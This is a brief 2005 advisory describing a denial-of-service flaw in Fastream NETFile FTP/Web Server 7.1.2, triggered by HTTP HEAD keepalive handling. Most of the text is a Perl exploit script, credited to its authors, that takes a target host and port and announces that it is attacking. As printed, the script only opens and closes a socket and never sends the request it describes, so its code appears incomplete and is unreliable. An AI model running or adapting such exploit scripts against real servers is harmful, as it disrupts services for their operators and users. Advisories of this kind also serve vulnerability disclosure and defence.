Fastream NETFile FTP/Web Server HTTP HEAD DoS (Exploit)
12 Sep. 2005
Summary
"Fastream NETFile FTP/Web Server is a secure FTP server and Web-based file server combined together in one program. Our claim is that it is the "easiest to setup and administer server" on the Internet!"
Due to improper handling of keepalive in HTTP HEAD requests, it is possible to cause a denial of service to Fastream NETFile FTP/Web Server.
Vulnerable Systems:
* Fastream NETFile FTP/Web Server version 7.1.2 Professional
Exploit:
#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit
#Bug found by bratax ck
#Coded bY karak0rsan
#d0gma.org // unuver.com
#Greetz:hurby,phalaposher,L4M3R,Atak,spymaster,razor...
$host=$ARGV[0];
$port=$ARGV[1];
if(!$ARGV[1]){
print "Fastream FTP/Web Server DoS\n";
print "Coded by karak0rsan // unuver.com\n";
print "Usage:perl $0 [target] [port]\n";
}
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect!\n";;
close($socket);
if($socket){
print "\n";
print "[+]Attacking..!\n";
}